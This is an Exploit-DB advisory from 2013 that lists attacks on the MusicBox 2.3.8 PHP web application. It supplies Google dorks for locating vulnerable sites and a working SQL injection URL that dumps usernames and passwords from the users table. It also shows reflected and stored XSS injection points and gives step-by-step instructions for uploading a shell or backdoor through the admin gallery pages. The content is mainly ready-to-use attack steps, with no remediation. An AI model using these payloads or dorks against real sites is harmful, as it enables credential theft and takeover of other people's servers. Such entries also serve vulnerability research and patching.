MusicBox 2.3.8 - Multiple Vulnerabilities

EDB-ID:

27876

CVE:


EDB Verified:

Author:

DevilScreaM

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2013-08-26

Vulnerable App: 
#Exploit Title 		: Musicbox 2.3.8 Multiple Vulnerabilities
#Author 		: DevilScreaM
#Date   		: 25/08/2013
#Category		: Web Applications 
#Vendor                 : http://www.musicboxv2.com/
#Version 		: 1.0 - 2.3.8

#Dork   	
intext:Musicbox Version
intext:Musicbox Version 2.3.8 © 2008 
inurl:genre_albums.php?id=

#Vulnerability  	: SQL Injection Vulnerability, XSS Vulnerability, Shell Upload Vulnerability 
#Tested On 		: Windows 7 32 Bit (Mozila & Chrome)
#Greetz                 : Newbie-Security.or.id
 

SQL Injection Vulnerability

http://site-target/genre_albums.php?id=[SQLI]

Example
http://site-target/genre_albums.php?id=-3+UNION SELECT 1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9,10+from+users--

==========================================================================================

Cross site scripting / XSS Vulnerability

*Search

1. Go To Fiture Search

2. Input your Cross Site Scripting, Example "<h1>Tested by DevilScreaM</h1>" , Click Search

3. See Result

or See with URL

http://site-target/index.php?in=song&term=[Cross site scripting/XSS]&action=search&start=0

Example

http://site-target/index.php?in=song&term=<h1>Tested by DevilScreaM</h1>&action=search&start=0


========================================================================================

*News Profile

1. Register To Website or go to link http://site-target/register.php

2. Login to Website

3. Go to Menu [ My News ]

4. At News Heading input your XSS, Example <h1>Tested by DevilScreaM</h1>

And at Detials input your XSS or Text

See your XSS at http://site-target/member.php?uname=[YOUR_USERNAME]

Example

http://server/musicbox/member.php?uname=devilscream


==========================================================================================

Shell Upload Vulnerability 

*Artist Galery

1. Go to Admin Page, And Login

2. Go to Upload Artist Image or Go to Link

http://site-target/admin/adminpanel.php?action=artistgallery

3. Select Your Shell/Backdoor , And Click Submit

4. Result Upload At 

http://site-target/artist_gallery/Your_Backdoor.php


============================================================================================

*Album Galery

1. Go to Admin Page, And Login

2. Go to Upload Album Image or Go to Link

http://site-target/admin/adminpanel.php?action=albumgallery

3. Select Option, Example Option "All Album", And Click Submit

3. Select Your Shell/Backdoor , And Click Submit

4. Result Upload At 

http://site-target/album_gallery/Your_Backdoor.php


==========================================================================================
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services